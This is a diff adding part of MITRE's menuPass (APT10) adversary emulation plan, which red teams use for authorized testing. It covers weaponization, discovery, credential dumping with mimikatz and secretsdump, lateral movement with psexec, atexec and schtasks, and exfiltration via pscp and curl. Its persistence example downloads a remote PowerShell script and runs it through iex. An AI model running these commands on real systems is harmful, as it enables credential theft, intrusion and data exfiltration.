+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
diff --git a/menuPass/Emulation_Plan/ResourceDevelopment.md b/menuPass/Emulation_Plan/ResourceDevelopment.md
new file mode 100644
index 00000000..2c6c7e2c
--- /dev/null
+++ b/menuPass/Emulation_Plan/ResourceDevelopment.md
@@ -0,0 +1,54 @@
+# Reconnaissance and Resource Development Overview
+
+* Emulating reconnaissance and resource development such as information gathering, capability development, and weaponization.
+* This step is not necessary to remain operationally representative but should be considered if you intend to attain initial access via phishing.
+
+## Contents
+
+  * [Step 1 - Information Gathering](#step-1---information-gathering)
+  * [Step 2 - Building Capabilities](#step-2---building-capabilities)
+  * [Step 3 - Weaponization](#step-3---weaponization)
+  * [Step 4 - Establish and Maintain Infrastructure](#step-2---establish-and-maintain-infrastructure)
+
+---
+
+# Reconnaissance
+
+## Step 1 - Information Gathering
+It is difficult to determine precisely how menuPass prepares for an operation.  We can however, assume that menuPass actors, after carefully selecting a target, perform some degree of technical, social, and organizational information gathering.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  This may also be the stage where menuPass actors acquire publicly available documents from the organization they intend to target, for later weaponization.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  They use the information from these efforts to identify individuals to be targeted and develop pretexts to be used in social engineering (phishing) attacks.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  If you intend to phish, this is the time to identify targets, develop pretext, and collect documents for weaponization.
+
+# Resource Development
+
+## Step 2 - Develop Capabilities
+menuPass is reported to have used both custom and publicly available tools.  This is the appropriate time to identify the C2 framework you will be using, select exploits (if you intend to use them), generate payloads, compile and rename tools.  menuPass is reported to have made use of several tools from the Impacket Suite.<sup>[7]((https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf))</sup>  Tools like atexec.py, secretsdump.py, and psexec.py should be compiled into executables using a python compiler.  You may also elect to use the compiled binaries [here](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.22.dev-binaries).
+
+## Step 3 - Weaponization
+menuPass is reported to have weaponized documents discovered during information gathering that were perceived to have been of interest to the intended target.  These documents would be weaponized with either an exploit or a macro that would inject tactical malware such as ChChes, EvilGrab, or Koadic.  The purpose of using a tactical implant during delivery is to mimimize the risk to, and later correlation with, the strategically emplaced sustained implants used for persistence at a later stage in the operation.  menuPass is widely reported to have weaponized these email messages in one of four ways:
+
+1. Macro
+2. .lnk file
+3. Exploit
+4. Masquerading
+
+menuPass actors are widely reported to have weaponized password protected MS Word/Excel documents with embedded VBA macros.<sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup>  After authenticating, the intended recipient will be prompted to "enable content/macros."  If enabled, the macro typically dropped files to a temp folder, decoded, executed, and deleted them.  This execution resulted in DLL sideloading and the subsequent establishment of C2 on the infected host.<sup>[8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)</sup> <sup>[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)</sup>
+
+menuPass is also reported to have attached zip files that contained .lnk files.  When executed, the .lnk file would invoke the command prompt and use PowerShell to download and execute another PowerShell script.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> This script was responsible for situating a tactical implant in memory.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[20](https://lac.co.jp/lacwatch/people/20170223_001224.html)</sup> <sup>[24](https://trendmicro/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)</sup>
+
+menuPass may have weaponized documents with exploits that targeted vulnerabilities in Microsoft products.<sup>[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)</sup> <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>  These exploits were responsible for achieving arbitrary code execution and subsequently downloading and situating a tactical implant like Koadic into memory.<sup>[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)</sup> <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+The final method of observed weaponization is masquerading.  menuPass is reported to have attached digitally signed versions of ChChess and other tactical implants to email messages and modified the icon of the attachment to reflect that of a Microsoft Word document.<sup>[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)</sup>
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
diff --git a/menuPass/Emulation_Plan/Scenario1.md b/menuPass/Emulation_Plan/Scenario1.md
new file mode 100644
index 00000000..1a06f1d1
--- /dev/null
+++ b/menuPass/Emulation_Plan/Scenario1.md
@@ -0,0 +1,482 @@
+# Preface
+
+The menuPass adversary emulation plan is comprised of two scenarios.  These scenarios were designed to be representative of the common corpus of publicly available reporting attributed to menuPass.  Each organization can tailor this emulation to their individual use case, priorities, and available resources.  Reconnaissance, resource development, and initial access considerations have been included for your consideration, and while relevant, are not necessary to remain operationally representative.
+
+Scenario 1 is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks.  Initial access could be achieved by either spearphishing or an assumed breach in which the emulation team is granted access to the environment using VPN, RDP, and elevated credentials.  menuPass is widely reported to have accessed customer networks from MSP networks using elevated credentials.  In pursuing an assumed breach scenario, you will be assessing the ability to protect, detect, and respond to execution, credential access, lateral movement, and exfiltration.  Your goal for Scenario 1 is to access a host, upload an operational toolkit, identify systems for staging and persistence, identify systems that may contain data that would be of interest to an adversary, harvest additional credentials, move laterally to systems of interest, and ultimately exfiltrate data, real or simulated.  To make the most of this scenario, consider information within your environment that would be sought after by an adversary, identify the most likely attack paths, and determine the feasibility of pursuing these attack paths.
+
+This emulation plan recommends procedures using tools reported to have been used by menuPass actors.  In some instances, assumptions have been made regarding tool syntax to account for intelligence gaps.  menuPass is reported to have used several different procedures to achieve similar objectives.  For the purpose of this emulation plan, we have selected one example and have presented the alternatives as  "Alternative Procedures."
+
+# Scenario 1 Overview
+
+* Emulating menuPass using VPN/RDP to access the environment and tools like tcping, netsess, mimikatz, psexec, and pscp to achieve tactical objectives with the operational intent of exfiltrating data.
+* Scenario 1 begins after a host is compromised/accessed and the operational toolkit is deployed.
+* The purpose of Scenario 1 is to assess your organization's ability to protect, detect, and defend tool ingress, discovery, credential harvesting, lateral movement, and exfiltration.
+
+## Prerequisites
+
+* You have either ownership of, or explicit authority and/or authorization to operate against the target network.
+* You have established your operational infrastructure.
+* You have acquired and compiled your operational toolkit
+
+## Contents
+
+* [Step 1 - Initial Access](#step-1---menupass-initial-access)
+* [Step 2 - Command and Control](#step-2---menupass-command-and-control)
+* [Step 3 - Discovery](#step-3---menupass-discovery)
+* [Step 4 - Credential Access](#step-4---menupass-credential-access)
+* [Step 5 - Lateral Movement](#step-5---menupass-lateral-movement)
+* [Step 6 - Collection](#step-6---menupass-collection)
+* [Step 7 - Exfiltration](#step-7---menupass-exfiltration)
+* [Step 8 - Execution](#step-8---menupass-execution)
+* [Step 9 - Persistence](#step-9---menupass-persistence)
+
+---
+
+## Step 1 - menuPass Initial Access
+
+### Procedures
+
+#### 1.A - Trusted Relationship ([T1199](https://attack.mitre.org/techniques/T1199/)), Valid Accounts - Domain Accounts ([T1078.002](https://attack.mitre.org/techniques/T1078/002/))
+
+menuPass is perhaps best known for what has been referred to as "Operation Cloud Hopper."<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> This activity is believed to have spanned from 2014-2018 and initially resulted in the compromise of several of the world's largest Managed Service Providers (MSP).  Ultimately, these MSP's were not the final objective.  menuPass would leverage its previously attained access to MSP networks to pivot into customer networks that aligned with the group's collection objectives.
+
+To do so, after gaining access to the MSP network, menuPass actors are reported to have sought out shared infrastructure.  menuPass actors are thought to have initially breached customer networks by using elevated MSP or subscriber domain credentials and remote access applications.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  Emulating initial access can be as simple as providing the emulation team with a VPN/RDP connection.  menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+---
+
+## Step 2 - menuPass Command and Control
+
+### Procedures
+
+#### 2.A - Ingress Tool Transfer ([T1105](https://attack.mitre.org/techniques/T1105))
+
+menuPass is reported to have used BITSAdmin to transfer tools from external infrastructure to hosts in the victim's network.  The tools were reported to have been dropped in C:\ProgramData\temp and C:\ProgramData\media.<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+
+Prior to transferring tools to the foothold, ensure they are compiled (if required) and renamed accordingly (optional). For this step, you should consider transferring secretsdump, atexec, psexec, nbtscan, netsess, tcping, nmap, winrar, pscp, and curl.
+
+```cmd
+C:\users\CVNX> powershell.exe
+PS C:\users\CVNX> Start-BitsTransfer -Source #{ } -Destination #{ }
+```
+
+Example:
+
+```cmd
+PS C:\users\CVNX> Start-BitsTransfer -Source http://123.456.7.89/TWUEGJDITXAONVPUOWFV -Destination C:\ProgramData\temp\TWUEGJDITXAONVPUOWFV
+```
+
+---
+
+## Step 3 - menuPass Discovery
+
+### Procedures
+
+#### 3.A - System Network Connections Discovery ([T1049](https://attack.mitre.org/techniques/T1049))
+
+List network connections to or from the compromised system.
+
+```cmd
+C:\users\CVNX> net use
+```
+
+#### 3.B - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018))
+
+Identify remote systems using net.
+
+```cmd
+C:\users\CVNX> net view /domain
+```
+
+#### 3.C - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018))
+
+Detect.vbs
+
+menuPass is reported to have packaged it's network reconnaissance tools in "detect.vbs."  When executed, the base64 encoded file decodes itself using certutil and drops "subnet.exe" and "rund1132.exe" (tcping) to the current working directory.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  To emulate this activity, we suggest conducting remote system discovery, and using tcping to conduct network service scanning.  Reporting indicates that menuPass is specifically interested in identifying the status of ports 445 and 3389 for the purpose of lateral movement.
+
+Example:
+
+```cmd
+PS C:\> Test-NetConnection 192.0.2.10
+```
+
+#### 3.D - Network Service Scanning ([T1046](https://attack.mitre.org/techniques/T1046))
+
+menuPass has used tcping, renamed to rund1132.exe, to identify and query the status of remote hosts on ports 445 and 3389.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+"#{tcping_local_path}"\tcping.exe "#{tcping_remote_ip}" "#{tcping_remote_port}"
+```
+
+Example:
+
+```cmd
+tcping.exe 192.0.2.10 445
+```
+
+#### 3.E - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016))
+
+menuPass has used nbtscan (nbt.exe) to scan for nameservers.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+nbtscan
+
+```cmd
+"#{nbtscan_local_path}"\nbtscan.exe "#{nbt_ip_range}"
+```
+
+Example:
+
+```cmd
+nbtscan.exe 192.0.2.10/24
+```
+
+#### 3.F - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016))
+
+menuPass has used netsess to enumerate NetBIOS sessions.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+NetSess
+
+```cmd
+"#{netsess_local_path}"\netsess.exe "#{netsess_remote_ip}"
+```
+
+Example:
+
+```cmd
+netsess.exe 192.0.2.10
+```
+
+---
+
+## Step 4 - menuPass Credential Access
+
+menuPass is thought to have initially accessed target environments using compromised credentials that granted elevated privileges.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  As such, privilege escalation was not necessary.  menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+The following procedures require elevated privileges.
+
+### Procedures
+
+#### 4.A - OS Credential Dumping: LSASS Memory ([T1003.001](https://attack.org/techniques/T1003/001)), Security Account Manager ([T1003.002](https://attack.mitre.org/techniques/T1003/002/)), LSA Secrets ([T1003.004](https://attack.mitre.org/techniques/T1003/004/))
+
+#### Mimikatz (Local)
+
+menuPass actors are reported to have used Mimikatz locally to gain access to additional credentials.  In some instances, Mimikatz was reported to have been uploaded to the compromised host and used to dump credentials from memory. <sup>[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)</sup>  In other instances, menuPass actors are reported to have sideloaded Mimikatz with various binaries. <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  Mimikatz requires elevated privileges.
+
+```cmd
+"#{mimikatz_local_path}"\mimikatz.exe
+
+mimikatz# privilege::debug
+
+mimikatz# log gggg.log
+
+mimikatz# sekurlsa::logonpasswords
+```
+
+#### 4.B - OS Credential Dumping: Security Account Manager ([T1003.002](https://attack.mitre.org/techniques/T1003/002/)), LSA Secrets ([T1003.004](https://attack.mitre.org/techniques/T1003/004/))
+
+#### Secretsdump (Remote)
+
+Secretsdump.py of the Impacket framework was compiled to secretsdump.exe and used to dump credentials remotely.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+"#{secretsdump_local_path}"\secretsdump.exe #{Domain}/#{User}:#{Password}@#{Ip Address}
+```
+
+Example:
+
+```cmd
+secretsdump.exe domain/CVNX:password123!@123.456.78.9
+```
+
+---
+## Step 5 - menuPass Lateral Movement
+
+menuPass lateral movement can be interpreted as having the following steps: access, deployment, execution, control.  By this point in the operation, menuPass actors are elevated, have ingressed tools, performed discovery, and harvested additional credentials to ensure freedom of movement throughout the domain.  These legitimate but compromised credentials will be coupled with tools indicative of administrative funtion to either simulate exfiltration, or remotely access a host to deploy and run a lightweight implant, thereby establishing control.
+
+An example of this work-flow is in reporting that indicates menuPass actors have used harvested credentials to access the domain controller, deploy Trochilus, and ultimately copy the NTDS.dit file.  The .dit file was staged, compressed and exfiltrated to attacker-controlled infrastructure.<sup>[11](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+
+menuPass is reported to have accessed remote hosts via RDP, PsExec, Atexec, or mapping network shares.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)</sup>  These work flows are described in the scenarios listed below.  They are not, however, intended to be mutually exclusive.  We suggest attempting different methods of access and execution.
+
+#### 5.A - System Services: Service Execution ([T1569.002](https://attack.mitre.org/techniques/T1569/002))
+
+menuPass appears to have used different versions of the PsExec tool to achieve the same purpose, remote code execution.  Reporting indicates the attackers may have used Sysinternals PsExec and a compiled version of Impacket's psexec.py.<sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>
+
+```cmd
+"#{psexec_local_path}"\psexec.exe "#{domain}"\"#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+```
+
+Example:
+
+```cmd
+psexec.exe domain\Administrator:badpassword123@192.0.2.10
+```
+
+#### Alternative Procedure 1: Remote Services - Remote Desktop Protocol ([T1021.001](https://attack.mitre.org/techniques/T1021/001))
+
+menuPass has used RDP to move laterally.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>  RDP grants the attacker console access to a remote host.  This access can be leveraged to deploy tactical malware.  There are a number of ways by which the implant could be executed, but this example will detail how to do so using WMI.
+
+1. Access - Access the remote host via RDP.
+
+```cmd
+mstsc /v #{ip_address}
+```
+
+2. Deploy - Upload tactical malware to the remote host via RDP session.
+
+3. Execute - Use wmic to run the implant
+
+```cmd
+wmic /node:#{ip_address} /user:#{"user_name"} /password#{"password"} process call create #{file_to_execute}
+```
+
+#### Alternative Procedure 2: Remote Services - SMB/Windows Admin Shares ([T1021.002](https://attack.mitre.org/techniques/T1021/002)), Lateral Tool Transfer ([T1570](https://attack.mitre.org/techniques/T1570))
+
+menuPass is reported to have moved laterally by mounting a network share, copying a file to the mounted share, and creating a scheduled task via Windows Task Scheduler to run the file.  After execution, the file was deleted.<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+
+1. Access - Mount a Network Share.
+
+```cmd
+net use #{drive}: #{ip_address}\#{drive} #{password} /user:#{domain}\#{user_name}
+```
+
+
+```cmd
+Example: C:\users\CVNX> net use z: \\192.0.2.10\C$ /u:targetdomain\victim badpassword123
+```
+
+2. Check to ensure the network share is mapped:
+
+```cmd
+net use
+```
+
+3. Deploy - Copy tactical malware to the mapped network share.
+
+```cmd
+copy #{file} #{drive}\#{destination_dir}
+```
+
+```example
+
+Example: copy #{file} z:\ProgramData\Temp
+
+```
+
+4. Execute - Create a Scheduled Task to Execute the File ([T1053.005](https://attack.mitre.org/techniques/T1053/005)):<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[22](https://jpcert.or.jp/present/2018/20171109codeblue2017_en.pdf)</sup>
+
+```cmd
+schtasks /create #{task_name} /tr #{path_of_the_file_to_run} /sc #{schedule} #{user_name} /s #{ip_address}
+```
+
+```cmd
+Example: C:\Users\CVNX> schtasks /create /tn WinUpdate /tr C:\ProgramData\Temp\WinUpdate.exe /sc onstart /ru System /s 192.0.2.10
+```
+
+5. Deleting the mapped network drive:
+
+```cmd
+net use z: /delete
+```
+
+#### Alternative Procedure 3
+
+menuPass actors are reported to have used atexec.py, compiled into an executable, to manipulate a remote machine's Task Scheduler and execute commands.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+#{atexec_local_path}\atexec.exe #{domain}\#{username}:#{password}@#{ip_address} #{command}
+```
+
+```cmd
+Example: atexec.exe domain\CVNX:'Password123!'@192.0.2.10 whoami
+```
+
+---
+
+## Step 6 - menuPass Collection
+
+### Procedures
+
+#### 6.A - Archive Collected Data - Archive via Utility ([T1560.001](https://attack.mitre.org/techniques/T1560/001))
+
+menuPass is thought to have renamed WinRAR to svchost.exe or r.exe, and used it to compress files prior to exfiltration.  The compression tools are reported to have been run using the group's renamed version of wmiexec ("t.vbs").<sup>[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+
+```cmd
+#{rar_local_path}\rar.exe a -hp #{password} #{rar_archive_name} #{rar_files}
+```
+
+menuPass Example:
+
+```cmd
+t.vbs r.exe a -hp CVNXPassword aa.rar rar_files
+```
+
+### Alternative Procedures
+
+In the event that WinRAR is unavailable, the following procedures can be used to create archives.  Please note that the suggested procedures are not identical to those reported to have been used by menuPass actors and will not result in rar archives.  They will however, compress the files for exfiltration using software that is freely available to Windows users.
+
+#### Alternative Procedure 1 - Tar
+
+The following procedure is freely available on Windows 10, build 17063 and later.
+
+```cmd
+tar.exe -a -c -f #{archive_filename} #{files_to_archive}
+```
+
+menuPass Example:
+
+```cmd
+tar.exe -a -c -f aa.zip exfil.txt
+```
+
+#### Alternative Procedure 2 - PowerShell
+
+```cmd
+powershell.exe
+Compress-Archive #{files_to_archive} #{archive_filename}
+```
+
+menuPass Example:
+
+```cmd
+powershell.exe
+Compress-Archive exfil.txt aa.zip
+```
+
+#### 6.B - Local Data Staging ([T1074.001](https:/attack.mitre.org/techniques/T1074/001/))
+
+menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+```cmd
+copy #{file_name} C:\$Recycle.Bin\
+```
+
+menuPass Example:
+
+```cmd
+C:\Users\CVNX copy aa.rar C:\$Recycle.Bin
+```
+
+---
+
+## Step 7 - menuPass Exfiltration
+
+### Procedures
+
+#### 7.A - Transfer Data to Cloud Account ([T1537](https://attack.mitre.org/techniques/T1537/))
+
+menuPass is reported to have used the PSCP client, renamed to rundll32.exe to exfiltrate data.<sup>[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+"#{pscp_local_path}"\pscp.exe "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+```
+
+menuPass Example:
+
+```cmd
+rundll32.exe aa.rar CVNX@192.0.2.10:/temp/loot
+```
+
+#### Alternative Procedures
+
+#### cURL
+
+menuPass actors are reported to have used cURL to exfiltrate data to a cloud based storage provider.<sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup>
+
+```cmd
+"#{curl_local_path}"\curl.exe -X POST -d #{file} #{exfiltration server}
+```
+menuPass Example:
+```cmd
+CU.exe -X POST -d aa.rar CVNX@192.0.2.10:/temp/loot
+```
+---
+
+## Step 8 - menuPass Execution (Optional)
+
+### Procedures
+
+#### 8.A - Windows Management Instrumentation ([T1047](https://attack.mitre.org/techniques/T1047))
+
+menuPass used a customized version of wmiexec to run tools and dump credentials.  These files are reported to have been dropped to C:\Recovery, C:\Intel, and C:\PerfLogs. <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+For the purpose of this plan, if you choose to assume compromise, we recommend using wmiexec to run whatever tactical implant you will be using.
+
+```cmd
+cscript.exe "#{wmiexec_local_path}"\wmiexec.vbs /shell "#{wmiexec_remote_host}"
+```
+
+Example:
+
+```cmd
+cscript.exe C:\Windows\Temp\wmiexec.vbs /shell 192.0.2.10
+```
+
+### Alternative Procedure
+
+#### Scheduled Task using Task Scheduler ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+menuPass has used atexec.py, compiled to atexec.exe to execute commands on remote hosts through the Task Scheduler service.<sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+atexec #{domain/username}:#{password}@#{ip address} #{command}
+```
+
+Example:
+
+```cmd
+atexec DOMAIN\Administrator:'badpassword123!'@192.0.2.10 systeminfo
+```
+
+---
+
+## Step 9 - menuPass Persistence (Optional)
+
+menuPass is reported to have been selective in persisting malware.  They are thought to have persisted sustained malware to specific systems and taken steps to ensure C2 would blend in with normal network communications.
+
+### Procedures
+
+#### 9.A - Scheduled Task ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+menuPass is reported to have created scheduled tasks to persist PlugX.<sup>[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+```cmd
+schtasks /create /sc #{schtask_schedule} /tn #{schtask_taskname} /tr #{schtask_taskrun} /ru #{schtask_username}
+```
+
+```cmd
+Example: schtasks /create /sc onlogon /tn WinUpdate /ru System /tr "powershell.exe -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://#{payload_server/#{payload}.ps1'})|iex""
+```
+
+### Alternative Procedures
+
+#### Create or Modify System Process - Windows Service ([T1543.003](https://attack.mitre.org/techniques/T1543/003))
+
+menuPass is reported to have persisted a PlugX implant by creating a Windows service.<sup>[5](https://fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup>
+
+```cmd
+sc create #{CorWrTool} binPath=#{"\"C:\Windows\vss\vixDiskMountServer.exe\"" start=auto displayname="#{Corel Writing Tools Utility}" type=own
+```
+
+#### Boot or Logon Autostart Execution - Registry Run Keys ([T1547.001](https://attack.mitre.org/techniques/T1547/001))
+
+menuPass is reported to have persisted EvilGrab and RedLeaves by creating a run keys.<sup>[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup>
+
+```cmd
+reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ctfmon /t REG_SZ /d "c:\users\#{}\#{iechecker.exe}
+
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ISeC Croot Readr
+```
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
diff --git a/menuPass/Emulation_Plan/Scenario2.md b/menuPass/Emulation_Plan/Scenario2.md
new file mode 100644
index 00000000..79f4ecac
--- /dev/null
+++ b/menuPass/Emulation_Plan/Scenario2.md
@@ -0,0 +1,308 @@
+# Preface
+Scenario 2 is designed to emulate activity attributed to menuPass that entails the pursuit of tactical objectives using a command-and-control framework with the operational intent of data exfiltration.  Initial access could be achieved with either spearphishing or an assumed breach in which the emulation team is granted access to a host. The scenario will begin when execution is achieved, and command and control is established.  This scenario differs from Scenario 1 in that instead of uploading an operational toolkit to the victim environment, it employs tactical and sustained malware to execute the subsequent procedures.  In emulating this scenario, you will be assessing your organization's ability to protect, detect, and defend execution, command and control, lateral movement, persistence, and exfiltration.
+
+# Scenario 2 Overview
+
+* Emulating menuPass using tools like Koadic C3 and QuasarRat.
+* Scenario 2 begins after a host is compromised, tactical malware has been deployed, and C2 is established.
+* Your objectives in Phase 2 are to conduct discovery, escalate privileges, harvest credentials, move laterally, choose specific systems to persist sustained malware (optional), collect, stage, and exfiltrate real or simulated data.
+
+There are many alternatives to the procedures detailed in this scenario.  What is most important is that these procedures have been accomplished, not necessarily how they have been accomplished.  If you lack the resources to complete this scenario procedure-by-procedure, feel free to "white card" or simulate where necessary.
+
+## Prerequisites
+
+* You have either ownership of, or explicit authority and/or authorization to operate against the target network.
+* You have established your operational infrastructure.
+* You have selected and installed your tactical implant/command-and-control framework.
+* If you intend to deploy and persist sustained malware, you have identified and compiled your implant.
+
+## Contents
+
+* [Step 1 - Initial Access](#step-1---menupass-initial-access)
+* [Step 2 - Execution](#step-2---menupass-execution)
+* [Step 3 - Discovery](#step-3---menupass-discovery)
+* [Step 4 - Privilege Escalation](#step-4---menupass-privilege-escalation)
+* [Step 5 - Credential Access](#step-5---menupass-credential-access)
+* [Step 6 - Lateral Movement](#step-6---menupass-lateral-movement)
+* [Step 7 - Exfiltration](#step-7---menupass-exfiltration)
+* [Step 8 - Command and Control](#step-8---menupass-command-and-control)
+* [Step 9 - Persistence](#step-9---menupass-persistence)
+
+---
+
+## Step 1 - menuPass Initial Access
+
+### Procedures
+
+#### Phishing ([T1566.001](https://attack.mitre.org/techniques/T1566/001), [T1566.002](https://attack.mitre.org/techniques/T1566/002))
+
+Aside from trusted relationship abuse, menuPass is perhaps best known for efforts to achieve initial access to target networks by deploying phishing emails.  These phishing emails deployed tactical malware by one of the four previously discussed methods (macro, .lnk, exploit, masquerading).  menuPass has leveraged this initial access to conduct discovery, pursue credential access, and identify systems of interest on which to deploy and persist sustained malware.
+
+## Step 2 - menuPass Execution
+
